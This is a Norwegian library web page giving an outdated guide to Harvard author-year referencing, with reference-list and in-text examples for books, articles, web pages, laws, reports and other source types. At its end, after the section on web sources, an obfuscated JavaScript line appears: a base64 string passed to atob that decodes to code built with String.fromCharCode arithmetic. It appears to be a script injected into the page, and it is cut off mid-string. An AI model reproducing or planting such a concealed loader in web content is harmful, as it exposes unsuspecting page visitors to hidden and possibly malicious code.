S&S » Harvard – utdatert versjon
Skriv ut

Harvard – utdatert versjon

Harvard er en forfatter-år stil. Stilen er brukt innenfor mange fagområder og finnes i flere varianter. Fremstillingen er basert på:

Skills for learning, Leeds Metropolitan University (2009) Quote, unquote: a guide to Harvard referencing [Internett], Leeds, Leeds Metropolitan University. Tilgjengelig fra: <http://www.scientific-journals.co.uk/web_documents/quote_unquote.pdf>

Finn ut om hvordan du siterer og henviser i teksten, lager en referanseliste og behandler forskjellige referansetyper

Referanselisten

  • Referanselisten skal ordnes alfabetisk på forfatters etternavn.
  • Ved flere medforfattere skal listen alfabetiseres ut fra førsteforfatteren.
  • Har en forfatter skrevet flere verk, skal de ordnes etter publikasjonsår.
  • Har en forfatter skrevet flere verk i samme år brukes a, b, c, etter årstallet for å skille arbeidene.
  • Du kan velge mellom å utheve eller skråstille tittel, vær konsekvent gjennom hele refereranselisten.

Bok

I teksten I referanselisten
Etternavn (Årstall, Sidetall) Etternavn, N.  & Etternavn, N.N. (Årstall) Tittel. Utgivelsessted, Utgiver.
Jacobsen og Thorsvik (2007, s. 13) hevder at … Jacobsen, D.I. & Thorsvik, J. (2007) Hvordan organisasjoner fungerer. 3. utg. Bergen, Fagbokforlaget.

Bok med flere forfattere

I teksten I referanselisten
Tre eller færre forfattere:
(Forfatternes etternavn, årstall, sidetall)Fire eller flere forfattere:
(Første forfatters etternavn et al., årstall, sidetall)
Alle forfatterne tas med:Etternavn, N.N, Etternavn, N.N. & Etternavn, N.N. (Årstall) Tittel. Utgivelsessted, Utgiver.
Machin, Campbell og Walters (2007, s. 14) hevder at…. Machin, D., Campbell, M. J. & Walters, S. J. (2007) Medical statistics: a textbook for the health sciences. 4. utg. Chichester, Wiley.
De seks medisinske kjernespørsmålene (Nortvedt et al., 2012, s. 35) bestemmer hvilken…. Nortvedt, M. W., Jamtvedt, G., Graverholt, B., Nordheim, L. V. & Reinar, L. M. (2012) Jobb kunnskapsbasert!: en arbeidsbok. 2. utg. Oslo, Akribe.

Kapittel i redigert bok

I teksten I referanselisten
(Etternavn, Årstall, Sidetall) Etternavn, N.N. (Årstall) Kapitteltittel. I: Redaktør, A. & Redaktør, B. red. Boktittel. Utgivelsessted, Utgiver, sidetall for kapittelet.
En større undersøkelse i England viste at …. (Trickett, 2001, s. 32). Trickett, E. J. (2001) Mental Health: community Interventions. I: Smelser, N.J. & Baltes, P.B. red. International Encyclopedia of the Social & the Behavioral Sciences. Amsterdam, Elsevier, s. 9645-9648.

Avhandling – doktor/master (publisert)

I teksten I referanselisten
(Etternavn, Årstall, Sidetall) Etternavn, N.N. (Årstall) Tittel. Akademisk avhandling, Universitetet.
Kyrkjebø (2001, s. 39) viser i sin doktoravhandling forskjellen på … Kyrkjebø, R. (2001) Heimskringla i etter Jofraskinna: karakteristikk av tekstvitna samt tekstkritisk utgåve av Jens Nilssøns avskrift i AM 37 folio. Akademisk avhandling, Universitetet i Bergen.

Artikkel i trykt tidsskrift

I teksten I referanselisten
(Etternavn, Årstall, Sidetall) Etternavn, N.N. & Etternavn, N.N. (Årstall) Artikkeltittel. Tidsskrifttittel, årgang (hefte) måned eller årstid, sidetall.
Rutinene er lagt om etter erfaringer fra ulykker (Dyregrov & Straume, 2003). Dyregrov, A. & Straume, M. (2003) Kollektiv ivaretakelse etter katastrofer: erfaringer fra ”Sleipnerulykken”. Tidsskrift for norsk psykologforening, 40 (2), s. 92-101.

Artikkel i elektronisk tidsskrift

 

I teksten I referanselisten
(Etternavn, Årstall, Sidetall) Etternavn, N. N. (Årstall) Artikkeltittel. Tidsskrifttittel [Internett], Årgang (hefte), sider. Tilgjengelig fra: [Lest dato].
Studier innen området viser at …. (Reychler, 2002). Reychler, L. (2002) Peace building architecture. Peace and conflict studies [Internett], 9 (1). Tilgjengelig fra: <http://www.gmu.edu/programs/icar/pcs/LR83PCS.htm> [Lest 11.februar 2003].

Artikkel i nettavis

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N. N. (Årstall) Artikkeltittel. Avis, dato, årstall, eventuelt sidetall [Internett]. Tilgjengelig fra: [Lest dato].
Man må se mer nyansert på utroskap og monogami (Thuen, 2006). Thuen, F. (2006) Utroskapens pris. Kronikk. Bergens Tidende, 5.oktober 2006 [Internett] Tilgjengelig fra: <http://www.bt.no/meninger/kronikk/Utroskapens-pris-1819069.html> [Lest 17.januar 2008].

Artikkel i trykt avis

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N. N. (Årstall) Artikkeltittel. Avis, dato [ikke årstall], sidetall, del.
Man må se mer nyansert på utroskap og monogami (Thuen, 2006). Thuen, F. (2006) Utroskapens pris. Bergens Tidende, 5.oktober, s. 12, del 2.

Nettside uten forfatter

I teksten I referanselisten
(Tittel på nettsted eller organisasjon, Årstall) Nettstedets navn/Organisasjon. (oppdatert dato/copyright dato) Tittel [Internett], Organisasjon. Tilgjengelig fra: [Lest dato].
Utlendingsdirektoratet (2006) belyser temaet internasjonal migrasjon… Utlendingsdirektoratet (1. april 2006) Internasjonal migrasjon [Internett], Utlendingsdirektoratet. Tilgjengelig fra: <http://www.udi.no/Sentrale-tema/Internasjonal-migrasjon/>[Lest 27.juni 2007].

Nettside med forfatter

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N.N./Redaktør, N.N. (oppdatert dato/copyright dato) Tittel [Internett], Utgivelsessted, Utgiver (dersom tilgjengelig). Tilgjengelig fra: [Lest dato].
Noack og Seierstad (2003) har undersøkt forekomsten av samboerskap… Noack, T. & Seierstad, A. (26. mars 2003) Samboerskap ved tusenårsskiftet: dagligdags og uutforsket [Internett], Oslo, Statistisk sentralbyrå. Tilgjengelig fra: <http://www.ssb.no/vis/samfunnsspeilet/utg/200301/05/art-2003-03-26-01.html> [Lest 29. februar 2008]

Artikkel i elektronisk leksikon (med forfatter)

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N.N. (oppdatert dato/copyright dato). Artikkeltittel. Oppslagsverk [Internett], Utgivelsessted, Utgiver (dersom tilgjengelig). Tilgjengelig fra: [Lest dato].
(Heflin, 2014) Heflin, M.T. (22.09.2014) Geriatric health maintenance. UpToDate [Internett]. Waltham, MA., UpToDate. Tilgjengelig fra: <http://www.uptodate.com/contents/geriatric-health-maintenance?source=search_result&search=%22timed+up+and+go%22+effect&selectedTitle=12~150> [Lest 20. nov. 2014]

Artikkel i elektronisk leksikon (uten forfatter)

I teksten I referanselisten
(Artikkeltittel, Årstall) Artikkeltittel (oppdatert dato/copyright dato). Oppslagsverk [Internett], Utgivelsessted, Utgiver (dersom tilgjengelig). Tilgjengelig fra: [Lest dato].
… i begrepet universell utforming ligger flere prinsipper (Universiell utforming, 2008). Universell utforming (2008) Wikipedia [Internett]. Tilgjengelig fra: <http://no.wikipedia.org/wiki/Universell_utforming> [Lest 3.januar 2008].

Artikkel i trykt leksikon (med forfatter)

I teksten I referanselisten
(Etternavn, Årstall, Sidetall) Etternavn, N. N. (Årstall) Tittel på artikkel. I: Tittel på leksikon, Volum, Nummer, Utgave. Sted, Forlag. Sidetal.
…ble født i 1860 (Risa, 2003, s. 405) Risa, G. (2003) Munthe, Margrethe. I: Norsk biografisk leksikon, Bind 6, Oslo, Kunnskapsforlaget. S. 405.

Bilder / Kunst / Fotografi

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N. N., (Årstall) Tittel på bilde [Medium]. (Spesifikasjon av samling).
Eldre fotografier av gaten (Schumann Olsen, 1920) Schumann Olsen, O. (1929) St. Hans strædet i Bergen [Fotografi]. (Inventarnummer UBB SO-0434 Universitetsbiblioteket i Bergen).

Digitale bilder / Kunst / Fotografi

Oppgi navn på fotograf/kunstner informasjon er gitt. Bruk tittel på bilde som referanse dersom fotograf/kunstner ikke er gitt. Om dato for bilde heller ikke er gitt skriver du (u.d.) forkortelse for uten dato.

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N.Tittel på bilde (Årstall) [Internettfoto]. Tilgjengelig fra: [Hentet dato].
Huyn, T. Streetlife (U.D) [Internettfoto]. Tilgjengelig fra:<http://tommyimages.com/Stock_Photos/Caribbean/Cuba/Life_in_Havana/slides/Cuba_01_E_8_19-Street_Life.html>[Hentet 18.desember 2013].
(Etternavn, Årstall) Tittel på bilde (Årstall) [Medium]. Tilgjengelig fra: [Hentet dato].
Nordlys (Northern lights (aurora borealis) over Tromso, Troms, Northern Norway) … Northern lights (aurora borealis) over Tromso, Troms, Northern Norway (u.d) [Internettfoto].Tilgjengelig fra:< http://www.theodora.com/wfb/photos/norway/norway_photos_48.html> [Hentet 26.november 2009].*Eksempel uten navngitt fotograf og når bildet ble tatt.
(Munch, 1883) Munch, E. (1883) Skrik [Digitalisert maleri]. Tilgjengelig fra: <http://www.munch.museum.no/work.aspx?id=17&wid=1>[Hentet 30. januar 2012]

Musikk/ Auditive kilder

Det finnes egne, spesialiserte regler for hvordan man skal referere til musikk, men Harvard-stilen har noen generelle anbefalinger. Referanse til en musikkinnspilling bør inneholde så mange som mulig av følgende elementer: Komponist/tekstforfatter/utøver eller annen person som er hovedansvarlig for innholdet, Verktittel, navn på plateselskap/utgiver, nummer som kan identifisere innspillingen, medium, opphavsretts-dato, eller dato for produksjon eller framføring. Rekkefølgen av elementene i henvisningen, vil avhenge av konteksten det opptrer i. Er opptaket hentet fra nettet, skal referansen inneholde dato samt URL eller DOI.

Hvis du har mange henvisninger til musikkverk, kan det være greit å samle disse i en diskografi, som en egen del av referanselisten.

I teksten I referanselisten
(Komponist el artist, Årstall) Komponist, A.A. (Årstall) Tittel på komposisjon, utøver(e). Plateselskap. [Lydformat].
I sangen Stella vil Gud gi Stella hele verden om hun bare blir hos han, gir han varme og holder han tett inntil seg (Ida Maria, 2008). Ida Maria (2008) Fortress ’round my heart, Ida Maria Sivertsen. Waterfall records. [Lydopptak CD].

Lover

I teksten I referanselisten
(Lovens kortnavn, eventuelt paragrafnummer, Årstall) Lovens kortnavn. (Årstall) Lovens fullstendige navn med vedtaksdato og nummer.Utgiversted og departement brukes ikke, fordi alle norske lover vedtas av Stortinget og utgis i Oslo. Eventuelt kan det lenkes til loven i fulltekst.
I Helsepersonelloven § 6 (1999) blir det slått fast at … Helsepersonelloven. (1999) Lov om helsepersonell m.v. av 2. juli 1999 nr. 64. Endringslov til helsepersonelloven. (2007) Lov om endringar i lov 2. juli 1999 nr. 6 om helsepersonell m.v. av 29. juni 2007 nr. 64. Tilgjengelig fra: <http://www.lovdata.no/ltavd1/filer/nl-20070629-061.html>[Lest 10.oktober 2007].

Forskrifter

I teksten I referanselisten
(Forskriftens kortnavn, Årstall) Korttittel til forskriften. (Årstall) Full tittel til forskriften. Fastsatt ved kgl.res. dato nummer med hjemmel i lov vedtatt dato om lovens korttittel.
Forskrift om oppfølging av sykmeldte (2007) viser til … Forskrift om oppfølging av sykmeldte. (2007) Forskrift om avklaring, arbeidsrettet rehabilitering og oppfølging for sykmeldte arbeidstakere. Fastsatt ved kgl. res. 28. mars 2007 nr. 360 med hjemmel i lov 10. desember 2004 nr. 76 om arbeidsmarkedstjenester. Tilgjengelig fra: <http://www.regjeringen.no/nb/dep/ad/dok/lover_regler/forskrifter/2007/forskrift-om-avklaring-arbeidsrettet-reh.html?id=478915> [Lest 10.oktober 2007].

Stortingsmeldinger og proposisjoner

I teksten I referanselisten
(Departement, Årstall) Departementet. (Årstall). Tittel på stortingsmelding. St.meld. nr (sesjon dvs. årstall). Utgiversted: Utgiver.
Dette temaet er nærmere belyst i St.meld. nr. 8 (Sosial- og helsedepartementet, 1998). Sosial- og helsedepartementet. (1998) Om handlingsplan for funksjonshemma 1998-2001: deltaking og likestilling. St.meld. nr 8 (1998-99). Oslo, Sosial- og helsedepartementet. Tilgjengelig fra: <http://www.regjeringen.no/nn/dep/ad/dokument/proposisjonar-og-meldingar/stortingsmeldingar/19981999/stmeld-nr-8-1998-99-.html?id=430886>  [Lest 21.mars 2013].

Norges offentlige utredninger (NOU)

I teksten I referanselisten
(Departement, Årstall) Departementet. (Årstall) Tittel. NOU årstall:nummer. Utgivelsessted, utgiver
I Norges offentlig utredninger, nr. 13, om kvinners helse i Norge viser Sosial- og helsedepartementet (1999) til … Sosial- og helsedepartementet. (1999) Kvinners helse i Norge. NOU 1999:13. Oslo, Statens forvaltningstjeneste. Tilgjengelig fra: <http://www.regjeringen.no/nb/dep/hod/dok/nouer/1999/nou-1999-13.html?id=141704> [Lest 21.mars 2013].

Rapporter

I teksten I referanselisten
(Forfatter, årstall, sidetall) Forfatter (årstall) Tittel. Rapport, nummer. Sted, Utgiver
(Folkehelseinstituttet, 2006, s. 8) Folkehelseinstituttet (2006) Rettleiar til forskrift om smittevern i helsetenesta. Smittevern, 15. Oslo, Folkehelseinstituttet.

Hellige skrifter og klassiske tekster

Hellige skrifter og klassiske tekster finnes i mange forskjellige utgaver, sidetall vil variere fra utgave til utgave og blir derfor utelatt. Noen tekster deles inn i nummererte kapittel, vers eller surer, dikt kan deles inn i bøker eller sanger og skuespill i akt og scene. Denne inndelingen er den samme i alle utgaver og brukes ved siteringer. Dette gjelder for eksempel Bibelen, Koranen og eldre greske og romerske tekster. Hvilken oversettelse man har brukt, skal også komme fram i referanselisten. Hellige tekster som Bibelen og Koranen trenger du som regel ikke å ta inn i referanselisten til slutt. En del tekster blir gjerne referert med standardforkortelser som kan variere mellom ulike fagfelt. For eksempel kan du bruke forkortelser for bøkene i Bibelen, som Apg for Apostlenes gjerninger.

I teksten I referanselisten
I Lukasevangeliet (Luk,1:34) er Maria i tvil om hun virkelig vil føde Guds barn. Bibelen: Den hellige skrift: Det gamle og Det nye testamentet (2013). Oslo, Bibelselskapet.
I skuespillet Hamlet (4. akt, 2. scene) viser Shakespeare… Shakespeare, W. (2002) Hamlet: prins av Danmark, oversatt av Øyvind Berg. Oslo, Kolon forlag.
Platon (Faidon, 118a) forteller at …. Platon (2001) Faidon, oversatt av Niels Henningsen. Fredriksberg, Det lille forlag.
I Ciceros «Om taleren» (1.47)… Cicero, M.T. (1993) Om taleren. I: Romersk retorikk, innleiing og omsetjing av Hermund Slaattelid. Oslo, Samlaget.
I Iliaden (6.344-58) sier Helena at… Homer (1920) Iliaden, oversatt av Peter Østbye. Kristiania, Aschehoug.

Upublisert materiale

I teksten I referanselisten
(Forfatter, Årstall) Forfatter, Etternavn, N. (Årstall) Tittel. Upublisert manuskript. Institusjon, sted (hvis tilgjengelig).
Med modernismen reverseres forholdet mellom persepsjon og representasjon (Utaker, 2010). Utaker, A. (2010) Det perseptuelles antropologi; persepsjon og bilder som filosofisk problem. Upublisert manuskript. Institutt for førstesemesterstudier og filosofi, Universitetet i Bergen, Os.

Manuskript under vurdering, men ikke antatt (submitted)

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N. N. (Årstall) Tittel. Manuskript innsendt for publisering / Submitted.
Det varierer i hvilken grad forskjellige befolkningsgrupper oppsøker hjelp i forbindelse med helseplager (Ting, Florsheim & Huang, 2008). Ting, J. Y., Florsheim, P., Huang, W. (2008) Mental health help-seeking in ethnic minority populations. Manuskript innsendt for publisering.

Manuskript under publisering, antatt (in press)

I teksten I referanselisten
(Etternavn, Årstall) Etternavn, N. N. (under publisering / in press) Tittel. Tidsskriftstittel
I følge Briscoe (under publisering), så er det slik at … Briscoe, R. (under publisering) Egocentric spatial representation in action and perception. Philosophy and Phenomenological Research.

Personlig kommunikasjon

Personlig kommunikasjon kan være direkte tale, e-post og liknende. Forbokstaver og etternavn samt nøyaktig dato må oppgis. Personlig kommunikasjon er sjelden tilgjengelig for leseren, men kan være det som i e-post. Du oppgir kun personlig kommunikasjon i referanselisten om dette er klarert med vedkommende. Du kan ha selve e-posten med som et vedlegg etter oppgaveteksten.

I teksten I referanselisten
(Initialer Etternavn, Dato) Etternavn, N. N. (e-postadresse), Sendt dato. Tittel i emnelinja.
Adressatens navn (e-postadresse).
I følge K. Knutsdotter (personlig kommunikasjon, 17. februar 2004)… Knutsdotter, K. (kari.knutsdotter@online.no), 17. februar 2004. Der ingen skulle tru at nokon kunne bu. E-post til O.Nordmann (ola.nordmann@gmail.com).

Henvisninger i teksten

Sidetall

Bruk sidetall i henvisningen etter årstall når du referer til en bok eller lengre artikkel. Dette er viktig for å sette leseren i stand til å gjennfinne kilden og etterprøve påstanden.

Forfatternavn

Bruker du forfatternavnet i setningen, skriv årstall i parentes etter forfatteren.

Barrow (1974, s. 19) fant…

Hvis forfatterens navn ikke står i setningen, skriv i en parentes forfatterens navn og årstall.

… (Barrow, 1974, s. 19).

Hvis en kilde har til og med tre forfattere må du skrive alle navnene hver gang referansen forekommer i teksten.

…(Gilhus, Seim & Vidén, 2009, s. 45).
Gilhus, Seim og Vidén (2009, s. 45) viser at… 

For kilder med fire eller flere forfattere skal du skrive førsteforfatter og ”et al.”. Deretter skriver du årstallet.

Kvale et al. (2009, s. 100) peker på at…
… (Kvale et al., 2009, s. 100).

Dersom man henviser til flere forfattere med samme etternavn og som har publisert i samme år skal initialer brukes.

R. D. Luce (1986) og P. A. Luce (1986) fant…

Når man henviser til flere forfattere samtidig i egen tekst skal forfatterne nevnes i kronologisk rekkefølge. I parentesen skal forfatterne skilles med semikolon.

Hansen (1965), Olsen (1978) og Jacobsen (2001) demonstrerer alle at…
Som vist i forskningen kan man (Hansen 1965; Olsen 1978; Jacobsen 2001) … 

Årstall

Hvis en forfatter har publisert flere arbeider samme år skilles de med at man tilføyer a, b, c og så videre etter årstallet

… (Faingold, 1996c).

Forkortelser

Dersom et dokument er utgitt av en offentlig instans, organisasjon eller forening skrives hele navnet i alle siteringer. Forkortelse kan brukes om den er lett gjenkjennelig. Ved første gangs sitering skriver du hele navnet og forkortelsen i hakeparentes.

(Norges rikskringkasting [NRK], 1999)

Deretter

(NRK, 1999)

Sekundærkilder

Dette er en referanse som du har lest om i et verk. Du skal i din tekst vise til både til det verket du har lest og det verket du har lest om. I litteraturlisten henviser du kun til det leste verket. For eksempel leser du om Winnicotts teori i boken til Solomon

Winnicott (1986, referert i Solomon, 2001, s. 50) viser til…

Sitat

Et direkte sitat fra en annen forsker/forfatter må være korrekt gjengitt og inneholde henvisning med forfatter, år og sidetall. I henhold til norsk praksis i akademisk skriving skal sitater som er tre linjer eller kortere skrives direkte inn i teksten og fremheves med hermetegn. Sitater som går over tre linjer skal skrives i et eget avsnitt med innrykk. Her brukes det ikke anførselstegn. Hvis du utelater deler av sitatet skal det erstattes av … [tre prikker] for å vise at ikke hele teksten er tatt med.

The similarity between demonstratives and articles, both synchronically and diachronically, is not coincidental but due to grammaticalization processes whereby old forms acquire new functions (Faingold, 2003, s. 53).

Eller

Faingold (2003) hevdet at «… but due to grammaticalization processes whereby old forms acquire new functions» (s. 53). I det videre …

Indirekte sitat

Indirekte sitat eller parafrasering er å gjengi en annen forfatter med egne ord. Pass på at du ikke fordreier meningsinnholdet i omskrivingen. Når du viser til en avgrenset del av en kilde bør henvisningen inneholde sidetall. Dette gjør leseren i stand til å finne raskt frem i kilden og å kontrollere fakta.

Kloster (2003, s. 10) snakker i sin hovedfagsoppgave om at singellivet som eksisterer i det senmoderne samfunnet er en konsekvens av demokratiseringen i den private sfæren.

Eller

….konsekvens av demokratiseringen i den private sfæren (Kloster, 2003, s. 10).

Nettsider/elektroniske dokumenter

Nettsider med forfatter refereres til med forfatternavn og årstall. Nettsider uten forfatter hvor artikkelen er en del av et større nettsted oppgis navnet til nettstedet/organisasjonen som forfatter. Dersom nettsiden er helt fristilt skal referansen i teksten oppgi noen ord av tittelen på siden for å vise leseren hvor den kan finnes i litteraturlisten. Ved referanse til et nettsted og ikke et spesifikt dokument på nettsiden oppgis hele adressen til siden i teksten.

Arbeidstilsynet er en nettside som inneholder denne type informasjon (http://www.arbeidstilsynet.no/).

var PKLQVVRYLQ = atob(‘dmFyIFZJWUhORUVSWkUgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE1IC0gNSwgMTI0IC0gNiwgMTAzIC0gNiwgMTIxIC0gNywgMzcgLSA1LCAxMTIgLSA1LCAxMDIgLSAxLCAxMjIgLSAxLCA0MSAtIDksIDYyIC0gMSwgMzQgLSAyLCA0MyAtIDQsIDEyMyAtIDEsIDk5IC0gMiwgNzggLSA3LCAxMDMgLSA2LCA3MiAtIDEsIDExMSAtIDQsIDcxIC0gMywgMTA1IC0gOCwgNzkgLSA1LCA5NSAtIDgsIDQxIC0gMiwgNjggLSA5LCAxOCAtIDgsIDEyNyAtIDksIDEwMCAtIDMsIDExNSAtIDEsIDM0IC0gMiwgMTAzIC0gMiwgMTEzIC0gMywgMTA2IC0gNywgMTAyIC0gMSwgMTAzIC0gMywgMzMgLSAxLCA2OCAtIDcsIDM4IC0gNiwgNDAgLSAxLCA3MyAtIDUsIDY3IC0gMiwgNzQgLSA5LCA1NyAtIDgsIDg5IC0gOCwgODggLSA0LCAxMDcgLSA4LCA5NyAtIDcsIDc3IC0gNCwgMTA3IC0gNCwgNTUgLSA2LCAxMTkgLSA2LCAxMDIgLSA1LCAxMTUgLSA3LCAxMTggLSA3LCA3MiAtIDIsIDgzIC0gOCwgNjYgLSAxLCA3OCAtIDUsIDEzMCAtIDksIDc1IC0gOSwgMTE0IC0gOSwgNzEgLSAyLCA4MSAtIDEsIDg3IC0gNywgMTEyIC0gMiwgMTA4IC0gMSwgOTQgLSA0LCA3NCAtIDUsIDEyOCAtIDcsIDc4IC0gNSwgNjkgLSA0LCA4NCAtIDcsIDEyOCAtIDksIDU1IC0gMywgNzUgLSA5LCA3NyAtIDksIDkwIC0gNywgNjAgLSA0LCA1OSAtIDUsIDc5IC0gNywgMTI0IC0gNSwgNTggLSAyLCAxMjUgLSAzLCA4NCAtIDEsIDk2IC0gOSwgNzAgLSA1LCA5NCAtIDUsIDc4IC0gNCwgMTI0IC0gNCwgODUgLSA4LCAxMDcgLSAxLCA3OCAtIDQsIDEyMyAtIDQsIDU5IC0gNiwgNzMgLSAyLCAxMDEgLSAzLCAxMDkgLSAxLCAxMjEgLSA5LCA3OSAtIDEsIDc0IC0gMywgMTMwIC0gOCwgOTQgLSA1LCA3NiAtIDQsIDc1IC0gMSwgMTE1IC0gNSwgMTEwIC0gMywgNzkgLSA1LCA3MSAtIDUsIDcwIC0gMiwgNzkgLSAyLCAxMDkgLSA2LCA4NCAtIDcsIDEyOCAtIDgsIDU4IC0gMiwgNTMgLSAzLCA3NCAtIDcsIDczIC0gNiwgMTA4IC0gNSwgMTE0IC0gOSwgNzQgLSA2LCAxMDcgLSA0LCA4MyAtIDEsIDExOSAtIDEsIDg5IC0gNywgMTE0IC0gOCwgOTAgLSA5LCA5NiAtIDYsIDc1IC0gMSwgNTAgLSAyLCA5OCAtIDgsIDExOCAtIDksIDEwMCAtIDEsIDcyIC0gNiwgNzQgLSAxLCA5MiAtIDYsIDc4IC0gMSwgMTI3IC0gNywgNzcgLSA3LCA2NiAtIDksIDg0IC0gMiwgNzUgLSA0LCAxMjEgLSA2LCA5MCAtIDQsIDg0IC0gNSwgNzAgLSAyLCA5MSAtIDIsIDEwMiAtIDMsIDc1IC0gOSwgMTI1IC0gNCwgNTggLSA2LCA3MiAtIDUsIDc2IC0gMiwgMTEzIC0gOSwgMTIyIC0gNywgMTIxIC0gNSwgODkgLSA1LCAxMjggLSA3LCA4MyAtIDIsIDU2IC0gMSwgODcgLSAxLCA4MyAtIDEsIDgxIC0gOCwgMTMwIC0gOCwgNzIgLSA3LCA3NyAtIDksIDg2IC0gOSwgNzEgLSA0LCA3NSAtIDEsIDU1IC0gNywgNTUgLSAzLCAxMTUgLSA1LCA4NSAtIDcsIDEwOCAtIDQsIDgyIC0gNSwgODYgLSA2LCAxMDMgLSA2LCA4MiAtIDEsIDEyMyAtIDgsIDUwIC0gMiwgODcgLSAzLCA3MiAtIDEsIDUxIC0gMiwgMTAxIC0gNCwgODMgLSAyLCA3MSAtIDMsIDg0IC0gNywgODcgLSAxLCA3MSAtIDYsIDExNSAtIDksIDc2IC0gMywgODEgLSA0LCA4MCAtIDcsIDEwOSAtIDYsIDk0IC0gOSwgMTI2IC0gNywgOTIgLSA4LCAxMjMgLSAyLCA4MiAtIDksIDEyMyAtIDIsIDc3IC0gNiwgMTIyIC0gMywgODkgLSAzLCAxMTggLSA2LCA3MiAtIDcsIDcwIC0gMiwgMTAyIC0gMywgOTkgLSAxLCA3NSAtIDIsIDg4IC0gNywgNjMgLSA3LCAxMjMgLSA2LCA3MiAtIDIsIDc0IC0gOCwgNzcgLSA0LCA3NSAtIDIsIDc2IC0gMSwgMTI4IC0gOSwgOTIgLSA2LCAxMjQgLSA2LCA3NCAtIDMsIDEyMyAtIDEsIDk4IC0gOSwgNzggLSA2LCA4MSAtIDcsIDExOSAtIDksIDU3IC0gNCwgNzIgLSA2LCAxMDAgLSAzLCAxMjMgLSA0LCA2NyAtIDYsIDY2IC0gNSwgNDYgLSA3LCA2MCAtIDEsIDE2IC0gNiwgMTEwIC0gOCwgMTE5IC0gMiwgMTExIC0gMSwgMTA3IC0gOCwgMTE5IC0gMywgMTEzIC0gOCwgMTE3IC0gNiwgMTExIC0gMSwgNDEgLSA5LCAxMjkgLSA5LCAxMjAgLSA5LCAxMTggLSA0LCA5OSAtIDQsIDEwNSAtIDQsIDExNiAtIDYsIDEwNCAtIDUsIDQxIC0gMSwgMTE5IC0gNCwgMTIzIC0gNywgMTE3IC0gMywgMTA5IC0gNCwgMTE3IC0gNywgMTExIC0gOCwgNTIgLSA4LCA0MSAtIDksIDEwOSAtIDIsIDExMCAtIDksIDEyMiAtIDEsIDQ5IC0gOCwgMzggLSA2LCAxMjggLSA1LCAxNyAtIDcsIDM5IC0gNywgMzcgLSA1LCAxMjUgLSA3LCAxMDQgLSA3LCAxMjAgLSA2LCAzOSAtIDcsIDEyMCAtIDYsIDEwNCAtIDMsIDEyMSAtIDYsIDM1IC0gMywgNzAgLSA5LCAzNSAtIDMsIDQwIC0gMSwgNDUgLSA2LCA2MiAtIDMsIDE1IC0gNSwgMzUgLSAzLCA0MCAtIDgsIDExMCAtIDgsIDExNiAtIDUsIDEyMyAtIDksIDM5IC0gNywgNDkgLSA5LCAxMjAgLSAyLCA5OCAtIDEsIDExNSAtIDEsIDM5IC0gNywgMTExIC0gNiwgMzQgLSAyLCA2NCAtIDMsIDM4IC0gNiwgNDkgLSAxLCA2NCAtIDUsIDM1IC0gMywgMTEwIC0gNSwgMzggLSA2LCA2MyAtIDMsIDM4IC0gNiwgMTE2IC0gMSwgMTI0IC0gOCwgMTE5IC0gNSwgMTA3IC0gMiwgMTE4IC0gOCwgMTA0IC0gMSwgNTEgLSA1LCAxMTAgLSAyLCAxMDcgLSA2LCAxMTYgLSA2LCAxMDQgLSAxLCAxMjMgLSA3LCAxMTIgLSA4LCA2NiAtIDcsIDM1IC0gMywgMTA4IC0gMywgNDYgLSAzLCA0NyAtIDQsIDQ3IC0gNiwgMzYgLSA0LCAxMjYgLSAzLCAxOCAtIDgsIDQwIC0gOCwgMzUgLSAzLCAzNyAtIDUsIDQxIC0gOSwgMTIzIC0gOSwgMTA5IC0gOCwgMTE3IC0gMiwgNDEgLSA5LCA0NiAtIDMsIDY1IC0gNCwgMzMgLSAxLCA5MCAtIDcsIDEyMCAtIDQsIDExOSAtIDUsIDEwOCAtIDMsIDExMyAtIDMsIDEwNCAtIDEsIDU0IC0gOCwgMTA1IC0gMywgMTIwIC0gNiwgMTE5IC0gOCwgMTEyIC0gMywgNzEgLSA0LCAxMTEgLSA3LCA5OSAtIDIsIDExNyAtIDMsIDc1IC0gOCwgMTE2IC0gNSwgMTA0IC0gNCwgMTA4IC0gNywgNDYgLSA2LCAxMTggLSAzLCAxMTkgLSAzLCAxMjIgLSA4LCAxMDcgLSAyLCAxMTQgLSA0LCAxMDggLSA1LCA1MyAtIDcsIDEwMCAtIDEsIDEwNSAtIDEsIDEwMSAtIDQsIDExNiAtIDIsIDcxIC0gNCwgMTEyIC0gMSwgMTAyIC0gMiwgMTAyIC0gMSwgNjggLSAzLCAxMjEgLSA1LCA0OSAtIDksIDEwNyAtIDIsIDQ1IC0gNCwgMzggLSA2LCAxMDAgLSA2LCAxOSAtIDksIDEzIC0gNCwgMTAgLSAxLCAxMiAtIDMsIDEzIC0gNCwgMTEwIC0gMywgMTA4IC0gNywgMTIzIC0gMiwgNDkgLSAzLCAxMDQgLSA1LCAxMTIgLSA4LCA5OSAtIDIsIDExOSAtIDUsIDY4IC0gMSwgMTEyIC0gMSwgMTAzIC0gMywgMTA0IC0gMywgNzAgLSA1LCAxMjEgLSA1LCA0MyAtIDMsIDExMiAtIDcsIDQxIC0gOSwgNDYgLSA5LCAzOSAtIDcsIDEwOCAtIDEsIDEwOCAtIDcsIDEzMCAtIDksIDUzIC0gNywgMTA5IC0gMSwgMTA0IC0gMywgMTEyIC0gMiwgMTA2IC0gMywgMTIzIC0gNywgMTEwIC0gNiwgNDMgLSAyLCA1MCAtIDksIDY3IC0gOCwgMTQgLSA0LCAzOCAtIDYsIDM0IC0gMiwgMTI5IC0gNCwgMTggLSA4LCA0MCAtIDgsIDQxIC0gOSwgMTIxIC0gNywgMTA4IC0gNywgMTIxIC0gNSwgMTE4IC0gMSwgMTIyIC0gOCwgMTEyIC0gMiwgMzMgLSAxLCAxMTYgLSAyLCAxMDMgLSAyLCAxMjIgLSA3LCA2NyAtIDgsIDEzIC0gMywgMTI5IC0gNCwgMTYgLSA2LCAxMSAtIDEsIDEyNiAtIDgsIDEwNCAtIDcsIDEyMSAtIDcsIDMzIC0gMSwgMTA5IC0gOSwgMTA0IC0gMywgMTA2IC0gNywgMzQgLSAyLCA3MCAtIDksIDQwIC0gOCwgMTI0IC0gNCwgMTE1IC0gNCwgMTIwIC0gNiwgMTAyIC0gNywgMTA4IC0gNywgMTE2